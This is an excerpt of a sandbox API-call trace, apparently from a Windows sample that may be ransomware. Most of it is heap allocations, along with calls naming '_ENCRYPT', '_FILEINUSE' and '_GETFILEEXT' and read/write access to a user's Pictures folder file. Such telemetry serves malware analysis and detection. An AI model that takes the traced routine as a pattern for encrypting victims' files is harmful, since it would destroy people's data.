HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.578] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0188.578] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.578] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0188.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.578] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0188.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0188.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0188.579] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0188.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0188.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0188.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0188.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0188.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0188.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0188.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0188.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0188.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.583] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.584] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0188.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba408 [0188.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba408, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0188.584] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.585] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.585] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.585] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.585] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.586] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0188.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0188.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd948, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0188.586] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.586] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0188.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0188.586] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0188.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0188.586] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0188.586] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0188.587] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0188.587] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.587] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0188.587] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.588] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0188.588] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.588] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, 